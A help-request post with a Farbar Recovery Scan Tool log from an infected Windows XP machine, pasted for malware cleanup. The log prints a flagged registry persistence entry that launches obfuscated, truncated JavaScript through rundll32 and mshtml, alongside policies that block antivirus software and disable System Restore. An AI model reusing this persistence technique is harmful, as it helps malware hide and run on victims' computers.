Not sure where it came from, but that is what infected this machine.
Did a couple things to get the thing usable again and hopefully stop the bleeding.
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 11-03-2015
Ran by Aspen Compressor (administrator) on TEST on 03-04-2015 12:52:58
Running from C:\Documents and Settings\Aspen Compressor\Desktop
Loaded Profiles: Aspen Compressor (Available profiles: Aspen Compressor & Administrator & Guest)
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
() C:\WINDOWS\system32\WLTRYSVC.EXE
(Dell Inc.) C:\WINDOWS\system32\BCMWLTRY.EXE
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Microsoft Corporation) C:\WINDOWS\system32\scardsvr.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(GEAR Software) C:\WINDOWS\system32\gearsec.exe
(Oracle Corporation) C:\Program Files\Java\jre7\bin\jqs.exe
(http://libusb-win32.sourceforge.net) C:\WINDOWS\system32\libusbd-nt.exe
(National Instruments Corporation) C:\WINDOWS\system32\lkads.exe
(National Instruments Corporation) C:\WINDOWS\system32\lktsrv.exe
(National Instruments Corporation) C:\Program Files\National Instruments\MAX\nimxs.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\NicConfigSvc.exe
(National Instruments Corporation) C:\WINDOWS\system32\nipalsm.exe
(National Instruments Corporation) C:\Program Files\National Instruments\Shared\Security\nidmsrv.exe
(National Instruments Corporation) C:\WINDOWS\system32\nisvcloc.exe
(National Instruments Corporation) C:\Program Files\National Instruments\Shared\Tagger\tagsrv.exe
() C:\Program Files\NTRU Cryptosystems\NTRU Hybrid TSS v2.0.25\bin\tcsd_win32.exe
(PowerQuest Corporation) C:\Program Files\PowerQuest\Drive Image 7.0\Agent\PQV2iSvc.exe
(National Instruments Corporation) C:\Program Files\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe
(National Instruments Corporation) C:\WINDOWS\system32\nipxism.exe
(National Instruments Corporation) C:\Program Files\IVI Foundation\VISA\WinNT\NIvisa\niLxiDiscovery.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Microsoft Corporation) C:\WINDOWS\system32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2011-10-24] (Apple Inc.)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5512912 2015-04-03] (Avast Software s.r.o.)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Symantec <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Trend Micro <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Common Files\Symantec Shared <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\ESET <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Symantec <====== ATTENTION
HKLM\...99B7938DA9E4}\LocalServer32: [a] rundll32.exe javascript:"qqq5\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Ridmm (the data entry has 27834 more characters). <==== ATTENTION!
HKLM\...\Policies\Explorer: [NoCDBurning] 0
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig] <===== ATTENTION
HKU\S-1-5-20\...\Run: [Adobe CSS5.1 Manager] => C:\Documents and Settings\NetworkService\Local Settings\Application Data\50e417e0-e461-474b-96e2-077b80325612ad\eeebebad.exe
HKU\S-1-5-20\...\RunOnce: [Adobe CSS5.1 Manager] => C:\Documents and Settings\NetworkService\Local Settings\Application Data\50e417e0-e461-474b-96e2-077b80325612ad\eeebebad.exe
HKU\S-1-5-21-2166601262-1343259015-1080389504-1009\...\Run: [547F5C72] => C:\Documents and Settings\Aspen Compressor\Application Data\547F5C72\bin.exe [145408 2015-04-03] (Karen Kenworthy)
HKU\S-1-5-18\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-03-03] (Google Inc.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll (Avast Software s.r.o.)
BootExecute: autocheck autochk * aswBoot.exe /M:108526275 /dir:"C:\Program Files\AVAST Software\Avast"
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2166601262-1343259015-1080389504-1009\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com/hws/sb/dell-usuk-rel/en/side.html?channel=us
HKU\S-1-5-21-2166601262-1343259015-1080389504-1009\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/hws/sb/dell-usuk-rel/en/side.html?channel=us
HKU\S-1-5-21-2166601262-1343259015-1080389504-1009\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=4070424
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2014-01-19] (Oracle Corporation)
BHO: Qualys BrowserCheck IE Helper -> {7D2FB79E-E58C-4DB5-A36F-AC1C73967FA5} -> C:\WINDOWS\Downloaded Program Files\qbc_bho.dll [2013-03-18] (Qualys, Inc.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-30] (Google Inc.)
BHO: Google Toolbar Notifier BHO -> {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} -> C:\Program Files\Google\GoogleToolbarNotifier\5.10.11023.1534\swg.dll [2015-03-30] (Google Inc.)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2014-01-19] (Oracle Corporation)
Toolbar: HKLM - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-30] (Google Inc.)
Toolbar: HKU\.DEFAULT -> Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKU\.DEFAULT -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-30] (Google Inc.)
Toolbar: HKU\S-1-5-21-2166601262-1343259015-1080389504-1009 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-30] (Google Inc.)
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/downl...-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {78AF2F24-A9C3-11D3-BF8C-0060B0FCC122} file:///C:/Program%20Files/AutoCAD%20LT%202002/AcDcToday.ocx
DPF: {7D2FB79E-E58C-4DB5-A36F-AC1C73967F4D} https://browsercheck.qualys.com/qbc_ax.cab
DPF: {AE563720-B4F5-11D4-A415-00108302FDFD} file:///C:/Program%20Files/AutoCAD%20LT%202002/InstBanr.ocx
DPF: {C6637286-300D-11D4-AE0A-0010830243BD} file:///C:/Program%20Files/AutoCAD%20LT%202002/InstFred.ocx
DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab
DPF: {F281A59C-7B65-11D3-8617-0010830243BD} file:///C:/Program%20Files/AutoCAD%20LT%202002/AcPreview.ocx
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - No File []
ShellExecuteHooks: Windows Desktop Search Namespace Manager - {56F9679E-7826-4C84-81F3-532071A8BCC5} - C:\Program Files\Windows Desktop Search\MSNLNamespaceMgr.dll [294400 2007-02-05] (Microsoft Corporation)
Winsock: Catalog5 04 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Winsock: Catalog5 06 C:\Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll [24216] (National Instruments Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.12
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-11] ()
FF Plugin: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-01-19] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2014-01-19] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll [2013-01-24] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-30] (Microsoft Corporation)
FF Plugin: @real.com/nppl3260;version=15.0.6.14 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll [2012-12-02] (RealNetworks, Inc.)
FF Plugin: @real.com/nprjplug;version=15.0.6.14 -> C:\Program Files\Real\RealPlayer\Netscape6\nprjplug.dll [2012-12-02] (RealNetworks, Inc.)
FF Plugin: @real.com/nprpchromebrowserrecordext;version=15.0.6.14 -> C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll [2012-12-02] (RealNetworks, Inc.)
FF Plugin: @real.com/nprphtml5videoshim;version=15.0.6.14 -> C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll [2012-12-02] (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=15.0.6.14 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll [2012-12-02] (RealPlayer)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-11] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-11] (Google Inc.)
FF Plugin: @viewpoint.com/VMP -> C:\Program Files\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll [2004-02-20] ()
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-05-11] (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: No Name - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2012-12-16]
FF HKLM\...\Firefox\Extensions: [{0153E448-190B-4987-BDE1-F256CADA672F}] - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext
FF Extension: RealPlayer Browser Record Plugin - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Firefox\Ext [2012-12-02]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-04-03]
Chrome:
=======
CHR Profile: C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-09-16]
CHR Extension: (Google Docs) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-09-16]
CHR Extension: (Google Drive) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-09-16]
CHR Extension: (YouTube) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-09-16]
CHR Extension: (Google Search) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-09-16]
CHR Extension: (Google Sheets) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-09-16]
CHR Extension: (RealPlayer HTML5Video Downloader Extension) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jfmjfhklogoienhpfnppmbcbjfjnkonk [2014-09-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-04-02]
CHR Extension: (Google Wallet) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-09-16]
CHR Extension: (Gmail) - C:\Documents and Settings\Aspen Compressor\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-09-16]
CHR HKLM\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Chrome\Ext\rphtml5video.crx [2012-12-02]
StartMenuInternet: chrome.exe - C:\Documents and Settings\dolsen\Local Settings\Application Data\Google\Chrome\Application\chrome.exe
========================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 6to4; C:\WINDOWS\System32\6to4svc.dll [100864 2010-02-12] (Microsoft Corporation)
S3 AOL ACS; C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe [46184 2014-02-06] (AOL Inc.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [343336 2015-04-03] (Avast Software s.r.o.)
S4 Bluetooth Hid Switch Service; C:\Program Files\BlueTooth\HidSwitchService\HidSw.exe [188416 2005-08-30] (Cambridge Silicon Radio) [File not signed]
S3 FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [651720 2010-03-31] (Macrovision Europe Ltd.) [File not signed]
R2 GEARSecurity; C:\WINDOWS\System32\GEARSec.exe [53248 2004-02-17] (GEAR Software) [File not signed]
R2 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182696 2014-01-19] (Oracle Corporation)
R2 libusbd; C:\WINDOWS\System32\libusbd-nt.exe [18944 2005-03-09] (http://libusb-win32.sourceforge.net) [File not signed]
S3 LkCitadelServer; C:\WINDOWS\system32\lkcitdl.exe [695136 2008-10-31] (National Instruments, Inc.)
R2 lkClassAds; C:\WINDOWS\system32\lkads.exe [42544 2009-06-18] (National Instruments Corporation)
R2 lkTimeSync; C:\WINDOWS\system32\lktsrv.exe [53296 2009-06-18] (National Instruments Corporation)
S4 msvsmon80; C:\Program Files\Microsoft Visual Studio 8\Common7\IDE\Remote Debugger\x86\msvsmon.exe [2799808 2005-09-23] (Microsoft Corporation)
R2 mxssvr; C:\Program Files\National Instruments\MAX\nimxs.exe [12696 2009-10-20] (National Instruments Corporation)
R2 NICCONFIGSVC; C:\Program Files\Dell\QuickSet\NICCONFIGSVC.exe [376832 2006-06-29] (Dell Inc.) [File not signed]
R2 nidevldu; C:\WINDOWS\system32\nipalsm.exe [12696 2008-08-21] (National Instruments Corporation)
R2 NIDomainService; C:\Program Files\National Instruments\Shared\Security\nidmsrv.exe [356912 2009-06-18] (National Instruments Corporation)
S3 NILM License Manager; C:\Program Files\National Instruments\Shared\License Manager\Bin\lmgrd.exe [1007616 2009-09-18] (Macrovision Corporation) [File not signed]
R2 niLXIDiscovery; C:\Program Files\IVI Foundation\VISA\WinNT\NIvisa\niLxiDiscovery.exe [131704 2009-03-05] (National Instruments Corporation)
R2 nimDNSResponder; C:\Program Files\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe [193648 2009-06-04] (National Instruments Corporation)
R2 nipxirmu; C:\WINDOWS\system32\nipxism.exe [14416 2010-02-18] (National Instruments Corporation)
R2 niSvcLoc; C:\WINDOWS\system32\nisvcloc.exe [13896 2009-06-04] (National Instruments Corporation)
R2 NITaggerService; C:\Program Files\National Instruments\Shared\Tagger\tagsrv.exe [607848 2008-06-20] (National Instruments Corporation)
S3 SolidWorks Licensing Service; C:\Program Files\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2010-09-23] (SolidWorks) [File not signed]
R2 tcsd_win32.exe; C:\Program Files\NTRU Cryptosystems\NTRU Hybrid TSS v2.0.25\bin\tcsd_win32.exe [180224 2006-06-12] () [File not signed]
R2 V2i Protector; C:\Program Files\PowerQuest\Drive Image 7.0\Agent\PQV2iSvc.exe [1253376 2004-02-17] (PowerQuest Corporation) [File not signed]
R2 wltrysvc; C:\WINDOWS\System32\bcmwltry.exe [2232320 2010-10-29] (Dell Inc.) [File not signed]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
S4 abp480n5; C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS [23552 2001-08-17] (Microsoft Corporation)
R1 APPDRV; C:\WINDOWS\SYSTEM32\DRIVERS\APPDRV.SYS [16128 2005-08-12] (Dell Inc) [File not signed]
R2 aswHwid; C:\WINDOWS\system32\drivers\aswHwid.sys [24144 2015-04-03] ()
R2 aswMonFlt; C:\WINDOWS\system32\drivers\aswMonFlt.sys [73440 2015-04-03] (Avast Software s.r.o.)
R1 aswRdr; C:\WINDOWS\system32\drivers\aswRdr.sys [55200 2015-04-03] (Avast Software s.r.o.)
R0 aswRvrt; C:\WINDOWS\system32\Drivers\aswRvrt.sys [49904 2015-04-03] ()
R1 aswSnx; C:\WINDOWS\system32\drivers\aswSnx.sys [788272 2015-04-03] (Avast Software s.r.o.)
R1 aswSP; C:\WINDOWS\system32\drivers\aswSP.sys [427736 2015-04-03] (Avast Software s.r.o.)
R1 aswTdi; C:\WINDOWS\system32\drivers\aswTdi.sys [57888 2015-04-03] (Avast Software s.r.o.)
R0 aswVmm; C:\WINDOWS\system32\Drivers\aswVmm.sys [208024 2015-04-03] ()
R3 BCM43XX; C:\WINDOWS\System32\DRIVERS\bcmwl5.sys [2649216 2010-10-29] (Broadcom Corporation)
S3 BCOREUSB; C:\WINDOWS\System32\Drivers\BCOREUSB.sys [86867 2005-10-03] (CSR)
S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-14] (Microsoft Corporation)
S3 CSRBC; C:\WINDOWS\System32\Drivers\csrbcxp.sys [31744 2007-01-16] (CSR, plc) [File not signed]
R2 cvintdrv; C:\WINDOWS\system32\Drivers\cvintdrv.sys [4096 2008-04-07] () [File not signed]
R2 DLABOIOM; C:\WINDOWS\System32\DLA\DLABOIOM.SYS [25628 2005-09-08] (Sonic Solutions) [File not signed]
R1 DLACDBHM; C:\WINDOWS\System32\Drivers\DLACDBHM.SYS [5628 2005-08-25] (Sonic Solutions) [File not signed]
R2 DLADResN; C:\WINDOWS\System32\DLA\DLADResN.SYS [2496 2005-09-08] (Sonic Solutions) [File not signed]
R2 DLAIFS_M; C:\WINDOWS\System32\DLA\DLAIFS_M.SYS [86524 2005-09-08] (Sonic Solutions) [File not signed]
R2 DLAOPIOM; C:\WINDOWS\System32\DLA\DLAOPIOM.SYS [14684 2005-09-08] (Sonic Solutions) [File not signed]
R2 DLAPoolM; C:\WINDOWS\System32\DLA\DLAPoolM.SYS [6364 2005-09-08] (Sonic Solutions) [File not signed]
R1 DLARTL_N; C:\WINDOWS\System32\Drivers\DLARTL_N.SYS [22684 2005-08-25] (Sonic Solutions) [File not signed]
R2 DLAUDFAM; C:\WINDOWS\System32\DLA\DLAUDFAM.SYS [94332 2005-09-08] (Sonic Solutions) [File not signed]
R2 DLAUDF_M; C:\WINDOWS\System32\DLA\DLAUDF_M.SYS [87036 2005-09-08] (Sonic Solutions) [File not signed]
R0 DRVMCDB; C:\WINDOWS\System32\Drivers\DRVMCDB.SYS [89264 2005-09-12] (Sonic Solutions) [File not signed]
R2 DRVNDDM; C:\WINDOWS\System32\Drivers\DRVNDDM.SYS [40544 2005-08-12] (Sonic Solutions) [File not signed]
S3 DSproct; C:\Program Files\Dell Support\GTAction\triggers\DSproct.sys [4864 2006-01-10] (GTek Technologies Ltd.) [File not signed]
R3 guardian2; C:\WINDOWS\System32\Drivers\oz776.sys [61312 2007-01-28] (O2Micro)
R3 libusb0; C:\WINDOWS\System32\drivers\libusb0.sys [33792 2005-03-09] () [File not signed]
S3 lvalarmk; C:\WINDOWS\system32\drivers\lvalarmk.sys [20104 2008-12-05] (National Instruments Corporation)
S2 MCUSBICD2; C:\WINDOWS\System32\Drivers\icd2w2k.sys [12427 2004-03-22] (Microchip Technology, Inc.) [File not signed]
S2 MCUSBPM3; C:\WINDOWS\System32\Drivers\PM3w2k.sys [12447 2004-03-22] (Microchip Technology, Inc.) [File not signed]
S3 NCBULK; C:\WINDOWS\System32\drivers\RealICEBulk.sys [12160 2007-04-05] (PLX Technology, Inc. (visit www.PlxTech.com)) [File not signed]
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-14] (Microsoft Corporation)
S3 ni1006k; C:\WINDOWS\system32\drivers\ni1006k.sys [26192 2009-10-20] (National Instruments Corporation)
S3 ni1045k; C:\WINDOWS\system32\drivers\ni1045kl.sys [11344 2009-10-20] (National Instruments Corporation)
S3 ni1065k; C:\WINDOWS\system32\drivers\ni1065k.sys [22608 2009-10-20] (National Instruments Corporation)
S3 nicdrk; C:\WINDOWS\system32\drivers\nicdrkl.sys [11352 2009-07-17] (National Instruments Corporation)
S3 nicmrk; C:\WINDOWS\system32\drivers\nicmrkl.sys [11368 2010-02-11] (National Instruments Corporation)
S3 nicsrk; C:\WINDOWS\system32\drivers\nicsrkl.sys [11336 2010-02-11] (National Instruments Corporation)
S3 nicsrkw; C:\WINDOWS\System32\DRIVERS\nicsrkw.sys [10824 2010-02-11] (National Instruments Corporation)
R3 nidimk; C:\WINDOWS\system32\drivers\nidimkl.sys [11360 2009-07-07] (National Instruments Corporation)
S3 nidmxfk; C:\WINDOWS\system32\drivers\nidmxfkl.sys [11336 2010-02-01] (National Instruments Corporation)
S3 nidsark; C:\WINDOWS\system32\drivers\nidsarkl.sys [11344 2010-02-06] (National Instruments Corporation)
S3 niemrk; C:\WINDOWS\system32\drivers\niemrkl.sys [11336 2010-02-11] (National Instruments Corporation)
S3 niesrk; C:\WINDOWS\system32\drivers\niesrkl.sys [11336 2010-02-06] (National Instruments Corporation)
S3 nifslk; C:\WINDOWS\system32\drivers\nifslkl.sys [11352 2010-02-02] (National Instruments Corporation)
R3 nimdbgk; C:\WINDOWS\system32\drivers\nimdbgkl.sys [11360 2009-11-13] (National Instruments Corporation)
R3 nimru2k; C:\WINDOWS\system32\drivers\nimru2kl.sys [11360 2009-08-24] (National Instruments Corporation)
S3 nimsdrk; C:\WINDOWS\system32\drivers\nimsdrkl.sys [11904 2010-02-02] (National Instruments Corporation)
S3 nimslk; C:\WINDOWS\system32\drivers\nimslk.dll [14464 2009-07-23] (National Instruments Corporation) [File not signed]
S3 nimsrlk; C:\WINDOWS\system32\drivers\nimsrlk.dll [151683 2009-07-23] (National Instruments Corporation) [File not signed]
R3 nimstsk; C:\WINDOWS\system32\drivers\nimstskl.sys [11872 2010-02-01] (National Instruments Corporation)
R3 nimxdfk; C:\WINDOWS\system32\drivers\nimxdfkl.sys [11344 2009-07-07] (National Instruments Corporation)
S3 nimxpk; C:\WINDOWS\system32\drivers\nimxpkl.sys [11880 2010-02-01] (National Instruments Corporation)
S3 ninshsdk; C:\WINDOWS\system32\drivers\ninshsdkl.sys [11360 2010-02-05] (National Instruments Corporation)
S3 niorbk; C:\WINDOWS\system32\drivers\niorbkl.sys [11344 2009-06-14] (National Instruments Corporation)
S3 nipalfwedl; C:\WINDOWS\System32\drivers\nipalfwedl.sys [11904 2010-01-10] (National Instruments Corporation)
R0 NIPALK; C:\WINDOWS\System32\drivers\nipalk.sys [597592 2010-01-10] (National Instruments Corporation)
S3 nipalusbedl; C:\WINDOWS\System32\drivers\nipalusbedl.sys [11896 2010-01-10] (National Instruments Corporation)
R0 nipbcfk; C:\WINDOWS\System32\drivers\nipbcfk.sys [15448 2009-07-07] (National Instruments Corporation)
S3 nipxigpk; C:\WINDOWS\system32\drivers\nipxigpk.sys [20568 2008-06-25] (National Instruments Corporation)
R2 nipxirmk; C:\WINDOWS\system32\drivers\nipxirmkl.sys [11344 2010-02-18] (National Instruments Corporation)
S3 niraptrk; C:\WINDOWS\system32\drivers\niraptrkl.sys [11336 2010-02-11] (National Instruments Corporation)
S3 niscdk; C:\WINDOWS\system32\drivers\niscdkl.sys [11376 2009-07-14] (National Instruments Corporation)
S3 nisdigk; C:\WINDOWS\system32\drivers\nisdigkl.sys [11352 2010-02-19] (National Instruments Corporation)
S3 nisftk; C:\WINDOWS\system32\drivers\nisftkl.sys [11344 2010-02-05] (National Instruments Corporation)
S3 nispdk; C:\WINDOWS\system32\drivers\nispdkl.sys [11376 2009-07-14] (National Instruments Corporation)
S3 nissrk; C:\WINDOWS\system32\drivers\nissrkl.sys [11336 2010-02-06] (National Instruments Corporation)
S3 nistc2k; C:\WINDOWS\system32\drivers\nistc2kl.sys [11312 2009-01-05] (National Instruments Corporation)
S3 nistc3rk; C:\WINDOWS\system32\drivers\nistc3rkl.sys [11328 2010-02-06] (National Instruments Corporation)
S3 nistcrk; C:\WINDOWS\system32\drivers\nistcrkl.sys [11360 2009-08-31] (National Instruments Corporation)
S3 niswdk; C:\WINDOWS\system32\drivers\niswdkl.sys [11336 2009-09-01] (National Instruments Corporation)
S3 nitiork; C:\WINDOWS\system32\drivers\nitiorkl.sys [11360 2010-02-06] (National Instruments Corporation)
S3 niufurk; C:\WINDOWS\system32\drivers\niufurkl.sys [11368 2010-02-11] (National Instruments Corporation)
S3 NiViFWK; C:\WINDOWS\System32\drivers\NiViFWKl.sys [11384 2009-03-05] (National Instruments Corporation)
S3 NiViPciK; C:\WINDOWS\System32\drivers\NiViPciKl.sys [11360 2009-06-21] (National Instruments Corporation)
R2 NiViPxiK; C:\WINDOWS\System32\drivers\NiViPxiKl.sys [11360 2009-06-21] (National Instruments Corporation)
S3 niwfrk; C:\WINDOWS\system32\drivers\niwfrkl.sys [11336 2010-02-06] (National Instruments Corporation)
S3 nixsrk; C:\WINDOWS\system32\drivers\nixsrkl.sys [11336 2010-02-11] (National Instruments Corporation)
R1 omci; C:\WINDOWS\System32\DRIVERS\omci.sys [17153 2004-02-13] (Dell Inc) [File not signed]
R1 PQIMount; C:\WINDOWS\system32\Drivers\PQIMount.sys [46773 2004-02-17] (PowerQuest Corporation) [File not signed]
R0 PQV2i; C:\WINDOWS\system32\Drivers\PQV2i.sys [138118 2004-02-17] (StorageCraft) [File not signed]
R0 PxHelp20; C:\WINDOWS\System32\Drivers\PxHelp20.sys [20576 2005-01-26] (Sonic Solutions) [File not signed]
R1 SbFw; C:\WINDOWS\System32\drivers\SbFw.sys [332248 2011-04-05] (Sunbelt Software, Inc.)
